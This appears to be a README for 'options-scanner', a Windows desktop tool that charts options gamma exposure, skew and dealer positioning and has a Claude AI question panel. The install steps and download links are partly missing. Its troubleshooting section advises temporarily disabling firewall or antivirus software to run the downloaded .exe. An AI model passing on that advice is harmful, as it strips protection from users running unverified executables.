🧩 What is options-scanner?

options-scanner is a software tool designed to help you track and understand options market data. It shows information about gamma exposure, volatility patterns, skew, and dealer positioning. You can use it to watch multiple stock tickers at once. It also offers analysis powered by Claude AI when you need extra insights.

You do not need any special skills to use this tool. It runs on Windows and offers a clear view of market data that can seem complex.

Before you begin, make sure your computer meets these requirements:

  • Windows 10 or later (64-bit)
  • At least 4 GB of RAM (8 GB recommended for best performance)
  • 500 MB of free disk space

This guide will help you download, install, and run options-scanner step-by-step. It assumes no prior experience with installing software.

After downloading the file, follow these steps to install options-scanner:

  2. Double-click the file to start the installer.

  • Click the Start menu
  • Type options-scanner in the search box
  • Click the options-scanner app icon when it appears

When the app launches, you will see the dashboard with default tickers loaded.


🔧 Using the Dashboard

The main screen shows several panels to help you scan the options market:

  • Gamma Exposure: Presents how much risk dealers have across different strikes.
  • Volatility Structure: Displays how option prices suggest future price swings.
  • Skew: Shows differences in price between calls and puts.
  • Dealer Positioning: Reveals what large options sellers are doing.
  • Claude AI Panel: Ask the AI questions about the market data to get clear, plain-English explanations.

Use the ticker input box at the top to add or change the stocks you want to watch.

Click the refresh button to update market data anytime.


🔍 Tips for Better Results

  • Add tickers of companies you follow or invest in.
  • Check the AI panel when you see unusual spikes or drops.
  • Use the filter tools to focus on certain strike rules or expiry dates.
  • Save your settings from the menu to keep the app ready for your next visit.

⚙️ Advanced Settings

You can adjust the data update frequency and notification preferences in the settings menu.

To access:

  • Click the gear icon in the top right corner
  • Change options like data refresh interval, default tickers, and AI interaction mode
  • Click Save to apply changes

🛑 Troubleshooting

If the app does not open or shows errors:

  • Make sure you downloaded the Windows .exe file from the release page.
  • Check that your Windows version is supported (Windows 10 or later).
  • Restart your computer and try opening the app again.
  • Ensure your internet connection is active for data updates and AI features.
  • Disable any firewall or antivirus software temporarily to see if it blocks the app (re-enable it later).
  • If you still face issues, you can report bugs on the GitHub issues page (requires basic internet use).

🔄 Updating options-scanner

The app does not update automatically. To install the latest version:

  1. Visit the releases page again:

  2. Download the newest Windows .exe file.
  3. Run the installer and follow the same steps as before. The new version will replace the old one without losing your settings.
